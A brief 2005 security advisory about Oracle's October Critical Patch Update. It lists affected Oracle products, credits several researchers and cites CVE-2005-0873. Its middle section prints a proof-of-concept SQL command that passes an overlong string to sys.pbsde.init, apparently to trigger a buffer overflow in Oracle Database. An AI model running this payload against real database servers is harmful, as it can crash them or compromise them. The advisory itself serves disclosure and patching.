Oracle October Security Update Multiple Vulnerabilities

Summary

Various Oracle Database Server, Oracle Enterprise Manager, Oracle Application Server, Oracle Collaboration Suite, Oracle E-Business Suite and Applications, and Oracle PeopleSoft Enterprise and JD Edwards EnterpriseOne are affected by multiple vulnerabilities.

Credit:

The information has been provided by Brian Carr; Sacha Faust ; Esteban Mart nez Fay ; Alexander Kornbrust.


Details

Vulnerable Systems:
 * PeopleSoft PeopleTools 8.46.3 and prior

Oracle has released a Critical Patch Update advisory for October 2005 to address these vulnerabilities. This Critical Patch Update addresses the vulnerabilities for supported releases. Earlier, unsupported releases are likely to be affected by the issues as well.

The following proof of concept code is available for DB27:
SQL> exec
sys.pbsde.init(‘AA’,TRUE,’MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_A
NN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MA
RY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSO
N_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON’,NULL);
BEGIN
sys.pbsde.init(‘AA’,TRUE,’MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_A
NN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MA
RY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSO
N_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON’,NULL); END;

CVE Information:
CVE-2005-0873

Disclosure Timeline:
Published: October 18 2005

Categories: News